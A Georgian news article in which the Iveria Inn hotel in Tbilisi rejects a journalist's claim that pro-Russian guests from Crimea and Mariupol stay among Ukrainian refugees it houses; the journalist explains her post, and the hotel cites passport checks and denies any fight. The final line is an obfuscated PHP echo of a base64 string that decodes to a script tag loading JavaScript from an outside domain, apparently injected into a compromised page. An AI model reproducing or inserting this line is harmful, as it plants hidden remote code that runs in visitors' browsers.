celsiusi
ავერსი საქკაბელი
სასტუმრო "ივერიაინნ"-ის ადმინისტრაცია „მათვარი არხის“ ჟურნალისტის ნინო ჟვანიას მიერ სოციალურ ქსელში გამოქვეყნებულ პოსტს პასუხობს და ჟურნალისტის მიერ მონათხრობს იმის შესახებ, რომ სასტუმროში პრორუსული განწყობის მარიუპოლელი და ყირიმელი უკრაინელები არიან განთავსებული დეზინფორმაციას უწოდებს. 
 
გუშინ ჟურნალისტმა სოციალურ ქსელში დაწერა ინფორმაცია იმის შესახებ, რომ სასტუმროში  მარიუპოლელი ლტოლვილის სახელს ამოფარებული "პუტინისტი" სტუმარები იმყოფებიან. ჟურნალისტი ერთ–ერთ უკრაინელზე დაყრდნობით, წერს, რომ უკრაინის მოქალაქეებს ერთ სივრცეში უწევთ ცხოვრება, პრორუსულად მოაზროვნე ყირიმელებთან, რომლებიც პოლიტიკურად ძალადობენ მათზე და მათთან ერთად არასასურველ პირობებში უწევთ ყოფნა.
 
აღნიშნულ საკითხთან დაკავშირებით, საინფორმაციო სააგენტო BUSINESS TIME "მთავარის" ჟურნალისტს დაუკავშირდა. 
 
ჟურნალისტი ნინო ჟვანიას თქმით, მისი სურვილი არ ყოფილა სასტუმროს რაიმე სახით დადანაშაულება, უბრალოდ ის შეეცადა, იმ საზოგადოებისთვის მიეწვდინა ინფორმაცია, ვინც დაინტერესებულია უკრაინელების დახმარებით.  
 
„ყირიმიდან და მარიუპოლიდან ჩამოსული რუსები, რომლებიც უკრაინული პასპორტებით არიან შემოსული ქვეყანაში, მაგრამ გულშემატკივრობენ პუტინის რუსეთს და სურთ ამ ომში უკრაინის დამარცხება, არიან საკუთარი ჯიპებით ჩამოსული და ბოროტად სარგებლობენ უკრაინელების სახელით დაუმსახურებლად. ჩემი პროტესტი მდგომარეობ იმაში, რომ ამ კატეგორიამ არ უნდა ისარგებლოს იმ ადამიანების კეთილგანწყობით, ვინც თვლის რომ უკრაინელებს უჭირთ და უნდა დაეხმარონ. ეს იყო ჩემი პოსტის მიზანი და არა სასტუმროს დადანაშაულება, როგორც ეს იქნა სამწუხაროდ აღქმული“, – განაცხადა ნინო ჟვანიამ საინფორმაციო სააგენტო BUSINESS TIME–თან.  
 
როგორც სასტუმრო „ივერია ინნ“-ში BUSINESS TIME–ს განუცხადეს, სასტუმროში  არ არის განთავსებული არცერთი რუსი, ან მათთვის ცნობილი რუსეთის პოლიტიკის მხარდამჭერი რომელიმე სტუმარი. სასტუმროს ადმინისტრაციას აქვს თითოეული სტუმრის პასპორტი, რომელსაც ჯერ ტურიზმის ადმინისტრაცია ან მერია, შემდეგ კი სასტუმროს წარმომადგენლები ამოწმებენ, შესაბამისად გამორიცხულია სტუმრებს შორის იყოს რუსეთის მოქალაქე. 
 
„ჟურნალისტი პოსტში ასევე წერს, რომ სასტუმროში მოხდა "ხელჩართული ჩხუბი" პუტინის მხარდამჭერებთან - არც ეს ფაქტი შეესაბამება სიმართლეს, რადგან ზოგადად კონფლიქტის პრეცენდენტი სასტუმროში არ ყოფილა, რასაც სასტუმროში განთავსებული თითოეული უკრაინელი ადასტურებს", - აცხადებენ სასტუმროში. 
 
აღსანიშნავია, რომ 25 თებერვლიდან სასტუმრო "ივერია ინნ" სრულიად უსასყიდლოდ მასპინძლობდა უკრაინის მოქალაქეებს, დღეს მათ განთავსებას თბილისის მერია და ტურისზმის ადმინისტრაცია უზრუნველყოფს. 
 
"ჩვენი სასტუმრო იყო ერთ–ერთი პირველი ვინც სურვილი გამოთქვა დახმარებოდა თავიდანვე უკრაინელებს, გვაქვს სპეციალური ჯგუფი სოციალურ ქსელში. ამ ადამიანებს მართლა სჭირდებათ დახმარება და ყველა იმას წერს ამ ჯგუფში რაც სჭირდება, ჩვენ კი მაქსიმალურად ყველაფერს ვაკეთებთ მათ დასახმარებლად, დღეს კი ამ პოსიტის შემდეგ ჩვენი მესიჯბოქსი სავსეა უარყოფითი და სასაყვედურო წერილებით, რაც ნამდვილად არ დაგვიმსახურებია. ჩვენ ვიმედოვნებთ, რომ ეს იყო უნებლიე შეცდომა“, – განგვიცხადეს სასტუმროში.  
 
ცნობისთვის, ამჟამად სასტუმრო „ივერია ინნ“-ში უკრაინის 300-მდე მოქალაქეა განთავსებული. 
 
1224
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");